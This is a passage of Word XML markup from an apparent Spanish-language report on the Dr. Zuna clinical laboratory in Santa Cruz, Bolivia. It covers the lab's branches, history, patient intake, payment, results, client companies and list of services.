      <w:bookmarkStart w:id="27" w:name="_Toc414243689"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C46F07B" wp14:editId="18845E9A">
            <wp:extent cx="3807887" cy="1050878"/>
            <wp:effectExtent l="19050" t="0" r="21590" b="321310"/>
            <wp:docPr id="13746504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837812" cy="105913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277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">El laboratorio clínico Dr. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> cuenta actualmente con 6 sucursal. la primera sucursal se encuentra en Av. Alemana Nº 2065, la segunda sucursal </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Av. Irala Nº 354, la tercera sucursal Av. Japón Nº 3809, la cuarta sucursal Calle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiluchi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nº 10, la quinta sucursal Calle España Nº 596 y la sexta sucursal Calle Buenos Aires Nº 157.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">Laboratorio de Análisis Clínico Dr. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> fue fundado en 1990 en Santa Cruz de la Sierra, Bolivia, por los doctores </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hugo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Villagómez, médico Hematólogo, y Ana Luisa Sierra de Silva, Bioquímica Bacterióloga</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">, con el objetivo de brindar a los médicos un diagnóstico rápido, confiable y oportuno en las distintas áreas laboratorios. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Desde sus inicios ofrece servicio de atención las 24 horas, los 365 días del año</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>, siendo pionero en prestar esta modalidad de atención en Santa Cruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:t xml:space="preserve">Atención al paciente </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">Cada paciente que llega al laboratorio es atendido primeramente por </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:t>las recepciones</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> que permitirá registrar todos sus </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:t>datos correspondientes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> para poder realizarse la prueba, el turno que le toca a cada paciente depende del análisis que se va hacer siendo en su mayoría de los análisis sin turnos. Por </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:t>ejemplo,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> para las pruebas de Test del sudor, ADN y pruebas con administración de medicamentos si se requiere que sea con turno.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:t>Forma de Pago</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="002A730A" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">En el laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A730A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> todos los pagos son al contando. A las empresas que están asociadas con este laboratorio si obtienen un porcentaje de descuento dependiendo de algunos ciertos parámetros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:t>Los Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">Los resultados son entregados después de un cierto tiempo dependiendo de las pruebas que se esté realizando siendo como el más mínimo de espera de 24 horas. Los resultados también se pueden ver a través del sitio web: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00BB4EFA">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.labzuna.com.bo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> siendo así de gran comodidad para el paciente no tener que moverse de su hogar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Las Empresas que Prefieren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FINO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>YAMBAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HALLIBURTON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMBOLPACK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INESCO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MADEPA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00825866" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="276E8B" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FRIDOSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00825866" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="276E8B" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light"/>
        </w:rPr>
        <w:t>Registro de pacientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">Cada paciente que llegue al laboratorio clínico se le </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46" w:rsidRPr="00BB4EFA">
        <w:t>pedirá</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> como datos principales su</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CI, Dirección, Teléfono, Celular </w:t>
      </w:r>
      <w:r w:rsidR="00B27B46">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>se pregunta si</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> toma algún medicamento.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="276E8B" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
        </w:rPr>
        <w:t>Servicios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve">Algunos servicios que brinda el laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Zuna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t xml:space="preserve"> son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hematología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Química Sanguínea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enzimología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uro</w:t>
      </w:r>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>análisis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parasitología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pruebas Especiales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bacteriología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Inmunología</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hormonas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Citogenética Clínica</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Listaconvietas2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:t>Servicio a domicilio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259"/>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc414318663"/>
